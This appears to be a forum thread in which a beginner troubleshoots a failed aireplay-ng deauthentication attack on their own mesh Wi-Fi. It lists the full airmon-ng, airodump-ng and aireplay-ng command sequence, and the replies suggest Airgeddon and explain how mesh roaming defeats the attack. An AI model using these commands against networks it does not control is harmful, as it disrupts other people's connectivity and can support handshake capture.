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Thread: Cant get aireplay-ng to deauth the device on mesh wifi system

  1. #1
    Join Date

    Cant get aireplay-ng to deauth the device on mesh wifi system

    So im new to this, started just yesterday actually. If this is breaking any forum rules i apologize, this looked like the correct place for tool questions, and a search didnt yeild much. But my current issue is when i try to deauth any device (Ive tried multiple devices at this point) i can not get it to go through. it sends packets but everything still receives internet, Im on a mesh dual band wifi system. I wrote down every command i use from boot to hopefully figure out what im doing wrong, my current process is as follows
    sudo ifconfig wlan0 down
    sudo airmon-ng check kill
    sudo iwconfig wlan0 mode monitor
    sudo ifconfig wlan0 up
    sudo airodump-ng --band abg wlan0
    sudo airodump-ng --band abg --essid (My wifi name)
    i then find the station i want to disconnect then the bssid its attached to
    sudo airodump-ng --band abg --bssid (Bssid device was attached to) --channel 157 wlan0
    while that is running i then try to do a deauth with
    sudo aireplay-ng --deauth 100000000 -a (Wifi MAC) -c (Device MAC) wlan0 -D
    When i run the aireplay-ng i still have internet on my host computer, the deauth message says its sending packets to the correct MAC with a 0|34 ACKs (Not always 34 but the first number is always 0)

  2. #2
    Join Date
    First, no tool is a magic bullet, they often don't 'just work', it can take many tries, and even when you get a capture, there's still work for it.. but I digress..
    Try Airgeddon, from a terminal;

    sudo airgeddon

    It uses all the tools you are trying and more, it will help you get you get to grips with the how of what you are trying to acheive

  3. #3
    Join Date
    Am also a newbie buh for what I've learnt for the past month is, to deauth a client from a network we use airodump-ng --bssid [Mac address of the network] --channel [ channel of the network] [name of wireless adapter in monitor mode]. You run the above command to see clients connected to that network and some other useful info. Then use aireplay-ng --deauth [number of deauth packets to send] -a[network Mac address] -c[client Mac address] [wireless adapter in monitor mode].

  4. #4
    Join Date
    The original poster mentioned trying to deauthorise a client on a mesh system, and that is always going to prove problematic, think about how mesh systems are designed to work, they try and keep you connected as you move about, supposedly dropping seamlessly from one AP and connecting immediately to another is how they are designed to work, so if you de-authorise a client from an AP surely it would just connect to the next available one in the 'mesh' that it can see....

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